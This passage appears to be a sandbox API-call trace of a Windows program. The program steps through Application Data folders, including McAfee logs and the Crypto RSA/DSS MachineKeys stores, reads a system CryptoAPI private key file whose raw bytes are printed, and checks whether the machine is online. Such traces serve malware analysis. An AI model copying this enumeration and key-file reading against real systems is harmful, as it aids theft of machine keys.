| 07:43:47,527 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,607 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\McAfee\MCLOGS\PartnerCustom\SecurityScan_Release\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:47,607 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x010PEx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x010\x96\x84{\xe4\x91\xcf\x010\x96\x84{\xe4\x91\xcf\x010\x96\x84{\xe4\x91\xcf\x01\xee\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x006\x00\x00\x00\x00\x00\x00\x00\x18\x00S\x00E\x00C\x00U\x00R\x00I\x00~\x001\x00.\x00L\x00O\x00G\x00S\x00e\x00c\x00u\x00r\x00i\x00t\x00y\x00S\x00c\x00a\x00n\x00_\x00R\x00e\x00l\x00e\x00a\x00s\x00e\x000\x000\x000\x00.\x00l\x00o\x00g\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,607 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,607 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,697 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:47,697 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:47,697 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:47,717 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:47,717 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:47,887 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\McAfee\MCLOGS\PartnerCustom\SSScheduler\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:47,887 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x0e\x0b|\xe4\x91\xcf\x01\x10\x1d\x0e|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x0e\x0b|\xe4\x91\xcf\x01\x10\x1d\x0e|\xe4\x91\xcf\x01\x10\x1d\x0e|\xe4\x91\xcf\x01\x10\x1d\x0e|\xe4\x91\xcf\x01\xb4\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00S\x00S\x00S\x00C\x00H\x00E\x00~\x001\x00.\x00L\x00O\x00G\x00S\x00S\x00S\x00c\x00h\x00e\x00d\x00u\x00l\x00e\x00r\x000\x000\x000\x00.\x00l\x00o\x00g\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,887 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,897 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,897 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,977 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:47,977 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01\x80A\x06(\xf2\x91\xcf\x01\xd0\xa8\xde1\xe0\x91\xcf\x01\xd0\xa8\xde1\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00y\x00p\x00t\x00o\x00t\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xd0\xa8\xde1\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:47,977 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,057 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:48,057 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arh\x00\x00\x00\x00\x00\x00\x000)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00S\x00S\x00t\x00n\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,057 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,137 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\DSS\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:48,137 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x000)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezo\x00\x00\x00\x00\x00\x00\x00\x000)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00A\x00C\x00H\x00I\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00a\x00c\x00h\x00i\x00n\x00e\x00K\x00e\x00y\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,137 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,218 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\DSS\MachineKeys\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:48,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x000)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x010)L2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,218 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,298 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:48,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00A\x00C\x00H\x00I\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00a\x00c\x00h\x00i\x00n\x00e\x00K\x00e\x00y\x00s\x00n\x00_\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xa9\xc4\x8e\xd5I\xcd\x01p\xa9\xc4\x8e\xd5I\xcd\x01p\xa9\xc4\x8e\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:48,298 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,378 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:48,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01@\x85D2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,378 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,458 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\S-1-5-18\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:48,458 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xa9\xc4\x8e\xd5I\xcd\x01p\xa9\xc4\x8e\xd5I\xcd\x01p\xa9\xc4\x8e\xd5I\xcd\x01p\xa9\xc4\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xe2\xd0\x8e\xd5I\xcd\x01 j\xd2\x8e\xd5I\xcd\x01 j\xd2\x8e\xd5I\xcd\x01 j\xd2\x8e\xd5I\xcd\x01}\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00$\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x10\x00D\x004\x002\x00C\x00C\x000\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x004\x002\x00c\x00c\x000\x00c\x003\x008\x005\x008\x00a\x005\x008\x00d\x00b\x002\x00d\x00b\x003\x007\x006\x005\x008\x002\x001\x009\x00e\x006\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,458 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\S-1-5-18\d42cc0c3858a58db2db37658219e6400_99d6ed61-80b2-42d4-8c72-45c08cbdb8ae DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:43:48,458 | 504 | NtReadFile |
Buffer => \x02\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\\x00\x00\x004\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00Schedule\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00RSA1H\x00\x00\x00\x00\x02\x00\x00?\x00\x00\x00\x01\x00\x01\x00\x01\xe0p\x14{\x92\x10\xa4\x1eGTxc\xa9=E\x8a\xb7P\x84V\xd9p\xd6_)\x93\x13Ho\xf6\xa14W \xa4\xd74C\xff
\x9b\x1b\xbe)(A\xddg-:h\xe3\xe2\xcf4|\xff\xc5r\xdb\xd2\x8d\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x8c\x9d\xdf\x01\x15\xd1\x11\x8cz\x00\xc0O\xc2\x97\xeb\x01\x00\x00\x00\xda\xcf\xf5\xd2\x83b\xcbE\xb7\xd4\x12\xa9F\x9e)\xc2\x00\x00\x00\x00,\x00\x00\x00C\x00r\x00y\x00p\x00t\x00o\x00A\x00P\x00I\x00 \x00P\x00r\x00i\x00v\x00a\x00t\x00e\x00 \x00K\x00e\x00y\x00\x00\x00\x03f\x00 FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:43:48,458 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000198 |
FAILURE | 3221225489 | |
| 07:43:48,468 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000f000 BaseAddress => 0x00173000 |
SUCCESS | 0x00000000 | |
| 07:43:48,468 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,468 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,468 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,468 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,518 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:48,518 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:48,518 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:48,518 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:48,518 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:48,548 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Dr Watson\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:48,548 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xa8\xde1\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01\x10\xb1\x832\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00P\xe2\xea1\xe0\x91\xcf\x01P\xed\xc62\xe0\x91\xcf\x01P\xed\xc62\xe0\x91\xcf\x01P\xed\xc62\xe0\x91\xcf\x01r\xe2\x02\x00\x00\x00\x00\x00\x00\xf0\x02\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00r\x00w\x00t\x00s\x00n\x003\x002\x00.\x00l\x00o\x00g\x00\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\xb1\x832\xe0\x91\xcf\x010\xc2\xbd2\xe0\x91\xcf\x010\xc2\xbd2\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:48,548 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,548 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,628 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\HTML Help\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:48,628 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\xe6\x8f\xe0\xd4I\xcd\x01p\xe6\x8f\xe0\xd4I\xcd\x01p\xe6\x8f\xe0\xd4I\xcd\x01p\xe6\x8f\xe0\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,628 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,628 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,728 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:48,728 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bN\xd3\xd4I\xcd\x01\xd0\x96\x19\xbd\xd5I\xcd\x01\x00\x0bN\xd3\xd4I\xcd\x01\x00\x0bN\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:48,728 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,728 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:48,808 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:48,808 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xf0\\xd1\xd5\xd4I\xcd\x01\xf0\\xd1\xd5\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x88\x00\x00\x00\x00\x00\x00\x00\xc0\xd5\xcf\xd5\xd4I\xcd\x01\xf0\\xd1\xd5\xd4I\xcd\x01\xc0\xd5\xcf\xd5\xd4I\xcd\x01\xf0\\xd1\xd5\xd4I\xcd\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x03\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x18\x00D\x00E\x00F\x00A\x00U\x00L\x00~\x001\x00.\x00B\x00I\x00N\x00D\x00e\x00f\x00a\x00u\x00l\x00t\x00S\x00t\x00o\x00r\x00e\x00_\x005\x009\x00R\x00.\x00b\x00i\x00n\x00\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\xf0\\xd1\xd5\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:48,808 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:48,808 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,039 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:49,039 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01@W\xaeQ\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00O\x00N\x00N\x00E\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00n\x00e\x00c\x00t\x00i\x00o\x00n\x00s\x00e\x00_\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xda7&\xe0\x91\xcf\x01\xd0\xda7&\xe0\x91\xcf\x01\xd0\xda7&\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,039 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,119 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:49,119 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezoh\x00\x00\x00\x00\x00\x00\x00\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00m\x00c\x00h\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01P\x8b\xa0\x89X\x94\xcf\x01\x80\x84\xfeR\xd4I\xcd\x01\x80\x84\xfeR\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:49,119 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,199 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Cm\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:49,199 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x80 \xcfT\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
